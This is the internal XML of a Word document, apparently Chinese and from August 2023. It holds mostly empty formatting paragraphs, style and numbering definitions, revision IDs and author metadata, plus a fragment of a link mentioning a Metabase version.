    <w:p w14:paraId="7FA8FF82" w14:textId="45DB58FE" w:rsidR="00BC4C3E" w:rsidRDefault="00961F8D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9A0804" wp14:editId="7E3B593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EE67" w14:textId="5FB645D1" w:rsidR="00961F8D" w:rsidRDefault="00961F8D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6085218" wp14:editId="4C8FFAEB">
            <wp:extent cx="5274310" cy="19183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3DA9" w14:textId="5800B2EC" w:rsidR="00961F8D" w:rsidRDefault="00961F8D" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DDCE9BE" w14:textId="0EFFE7FB" w:rsidR="00961F8D" w:rsidRDefault="00961F8D" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A734661" w14:textId="035FA194" w:rsidR="00961F8D" w:rsidRDefault="00961F8D" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06C64FEF" w14:textId="00F53AE7" w:rsidR="00961F8D" w:rsidRDefault="00961F8D" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A6DFD84" w14:textId="77777777" w:rsidR="00961F8D" w:rsidRDefault="00961F8D" w:rsidP="004C1793">
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:ind w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00961F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A5389" w14:textId="77777777" w:rsidR="00FD0FEA" w:rsidRDefault="00FD0FEA" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B3165A8" w14:textId="77777777" w:rsidR="00FD0FEA" w:rsidRDefault="00FD0FEA" w:rsidP="00705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CFA7F" w14:textId="77777777" w:rsidR="00FD0FEA" w:rsidRDefault="00FD0FEA" w:rsidP="00705A99">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5838CCE8" w14:textId="77777777" w:rsidR="00FD0FEA" w:rsidRDefault="00FD0FEA" w:rsidP="00705A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3E9BDD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BD3E9BDD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ViNTMyZTBmYjViOGI3ZGQ5MjhkNjE5MDJlMGJiNTQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="0078712B"/>
    <w:rsid w:val="0006000C"/>
    <w:rsid w:val="000E0CFA"/>
    <w:rsid w:val="0025100D"/>
    <w:rsid w:val="002B32D9"/>
    <w:rsid w:val="002E22F7"/>
    <w:rsid w:val="00361277"/>
    <w:rsid w:val="00375CCE"/>
    <w:rsid w:val="003C6EF5"/>
    <w:rsid w:val="004435E1"/>
    <w:rsid w:val="00452910"/>
    <w:rsid w:val="004B0A83"/>
    <w:rsid w:val="004C1793"/>
    <w:rsid w:val="004E1BBB"/>
    <w:rsid w:val="004E4F70"/>
    <w:rsid w:val="004F3E9D"/>
    <w:rsid w:val="00512D3E"/>
    <w:rsid w:val="00516859"/>
    <w:rsid w:val="005B758B"/>
    <w:rsid w:val="005F1959"/>
    <w:rsid w:val="00633A4A"/>
    <w:rsid w:val="006A1D6C"/>
    <w:rsid w:val="006C2EAA"/>
    <w:rsid w:val="00705A99"/>
    <w:rsid w:val="0078712B"/>
    <w:rsid w:val="007D0BA6"/>
    <w:rsid w:val="007F1F6A"/>
    <w:rsid w:val="00860955"/>
    <w:rsid w:val="00886C87"/>
    <w:rsid w:val="00887D7E"/>
    <w:rsid w:val="00961F8D"/>
    <w:rsid w:val="00963091"/>
    <w:rsid w:val="00992E1C"/>
    <w:rsid w:val="009B39E8"/>
    <w:rsid w:val="00A00FDD"/>
    <w:rsid w:val="00A21148"/>
    <w:rsid w:val="00A609F0"/>
    <w:rsid w:val="00A97EAA"/>
    <w:rsid w:val="00AC2EA2"/>
    <w:rsid w:val="00B63775"/>
    <w:rsid w:val="00BB6D88"/>
    <w:rsid w:val="00BC4C3E"/>
    <w:rsid w:val="00CB0976"/>
    <w:rsid w:val="00D70244"/>
    <w:rsid w:val="00DA5227"/>
    <w:rsid w:val="00E24FC3"/>
    <w:rsid w:val="00F524F5"/>
    <w:rsid w:val="00F70684"/>
    <w:rsid w:val="00FD0FEA"/>
    <w:rsid w:val="021952DC"/>
    <w:rsid w:val="11E06E41"/>
    <w:rsid w:val="15E3766F"/>
    <w:rsid w:val="1D2B18B9"/>
    <w:rsid w:val="1EAB3DBD"/>
    <w:rsid w:val="294206B6"/>
    <w:rsid w:val="29C33735"/>
    <w:rsid w:val="2C573847"/>
    <w:rsid w:val="34960C3E"/>
    <w:rsid w:val="379E56B4"/>
    <w:rsid w:val="39012385"/>
    <w:rsid w:val="3BBD1E25"/>
    <w:rsid w:val="3F8A6B26"/>
    <w:rsid w:val="41EC0D67"/>
    <w:rsid w:val="480D1A37"/>
    <w:rsid w:val="496D3711"/>
    <w:rsid w:val="49D15412"/>
    <w:rsid w:val="4BB430E1"/>
    <w:rsid w:val="535D7D17"/>
    <w:rsid w:val="557F21C6"/>
    <w:rsid w:val="5DC82230"/>
    <w:rsid w:val="63B42170"/>
    <w:rsid w:val="64AD38C1"/>
    <w:rsid w:val="68024591"/>
    <w:rsid w:val="6E042670"/>
    <w:rsid w:val="6FC0720B"/>
    <w:rsid w:val="707D00C0"/>
    <w:rsid w:val="7113443A"/>
    <w:rsid w:val="72C07522"/>
    <w:rsid w:val="797F1E79"/>
    <w:rsid w:val="79A547A7"/>
    <w:rsid w:val="7B5A38B2"/>
    <w:rsid w:val="7DA41F1A"/>
    <w:rsid w:val="7F8D69DE"/>
    <w:rsid w:val="7FEE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1DDC38"/>
  <w15:docId w15:val="{9EF1A729-51F5-41CA-B342-21F6F96E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wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0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semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:num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qFormat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10">
    <w:name w:val="正文1"/>
    <w:basedOn w:val="a"/>
    <w:qFormat/>
    <w:pPr>
      <w:wordWrap w:val="0"/>
      <w:topLinePunct/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLineChars="200" w:firstLine="880"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:rsid w:val="00705A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705A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705A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705A99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705A99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="ab">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:rsid w:val="00705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87D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887D7E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metabase.com/v0.46.6.3/metabase.ja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3982</TotalTime>
  <Pages>10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凌空</dc:creator>
  <cp:lastModifiedBy>016 CN</cp:lastModifiedBy>
  <cp:revision>36</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-08-08T16:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T14:01:00Z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8BE1C4494BBF49E285AA0D06EFF0E4C2</vt:lpwstr>
  </property>
</Properties>
</file>